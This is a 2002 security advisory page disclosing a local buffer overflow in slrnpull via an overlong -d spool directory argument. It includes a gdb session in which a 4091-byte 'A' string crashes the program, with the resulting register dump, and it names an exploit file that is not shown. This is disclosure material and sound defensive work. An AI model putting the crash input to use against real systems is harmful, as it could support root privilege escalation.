Mapa web

Services

Products

I+D & Advisories

News

Customers

Partners

Employ

Advisories

SYBSEC-ADV08: Slrnpull -d SPOOLDIR Buffer Overflow

Title	Slrnpull -d SPOOLDIR Buffer Overflow
ID	SYBSEC-ADV08
Severity	HIGH - Local Buffer Overflow
History	10.APR.2002 Vulnerability discovered 15.APR.2002 Vendor contacted
Scope	Local Buffer Overflow Vulnerability
Platforms	All Linux Flavors:
Author	Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
URL	http://www.sybsecurity.com/advisors/SYBSEC-ADV08-Slrnpull_Spool_Directory_Command_Line_Parameter_Local_Buffer_Overflow_Exploit
Release	Public
Overview	slrnpull is a program used for pulling newsfeeds from an NNTP server to a local spool directory, which can be read locally by a newsreader program.
Affected versions	The vulnerability has been reported in versions Linux Server - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.2 + RedHat Linux 7.0 sparc + RedHat Linux 7.0 i386 + RedHat Linux 7.0 alpha + RedHat Linux 6.2 sparc + RedHat Linux 6.2 i386 + RedHat Linux 6.2 alpha - Wirex Immunix OS 7.0 -Beta - Wirex Immunix OS 7.0 - Wirex Immunix OS 6.2
Description	Some versions of slrnpull are vulnerable to a buffer overflow. By specifying an overly long SPOOLDIR (Spool Directory) file name using the -d command line argument, a local attacker could overflow a buffer and execute arbitrary code on the system with root privileges.
Workaround	Upgrade the sofware version you can download from: http://www.redhat.com
Acknowledgments	This vulnerability have been found and researched by: - Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References	* RedHat: http://www.redhat.com * Xforce ISS Team: http://xforce.iss.net/xforce/xfdb/8910 * Safemode: http://safemode.org * SYB Security: http://www.sybsecurity.com
Details	[alex@Lab /tmp]$ /usr/bin/gdb /usr/bin/slrnpull GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-redhat-linux"...(no debugging symbols found)... (gdb) set args -d `perl -e 'print "A" x 4091'` (gdb) r Starting program: /usr/bin/slrnpull -d `perl -e 'print "A" x 4091'` 04/15/2002 16:39:45 ***File name too long. 04/15/2002 16:39:45 slrnpull started. (no debugging symbols found)... v Program received signal SIGSEGV, Segmentation fault. 0x700f8ad0 in getenv () at ../sysdeps/generic/getenv.c:100 100 ../sysdeps/generic/getenv.c: No such file or directory. (gdb) (gdb) inf all g0 0x0 0 g1 0x1010101 16843009 g2 0x80808080 -2139062144 g3 0x0 0 g4 0x30 48 g5 0x28 40 g6 0x0 0 g7 0xff 255 o0 0x5a540000 1515454464 o1 0xefffeb54 -268440748 o2 0x5a 90 o3 0x54 84 o4 0x6a656374 1785029492 o5 0x72766965 1920362853 sp 0xefffdde0 -268444192 o7 0x700f89f4 1880066548 l0 0xefffeb54 -268440748 l1 0x701c2702 1880893186 l2 0x0 0 l3 0x5a54 23124 l4 0x0 0 l5 0x0 0 l6 0x0 0 l7 0x41414141 1880999612 i0 0x41414141 1094795585 i1 0xfffff974 -1676 i2 0x1 1 i3 0x0 0 i4 0x0 0 i5 0x0 0 fp 0xefffde48 -268444088 i7 0x70152864 1880434788 f0 0 (raw 0x00000000) 0 f1 0 (raw 0x00000000) f2 0 (raw 0x00000000) 0 f3 0 (raw 0x00000000) [...]
Exploit tool	sybsec-adv08.txt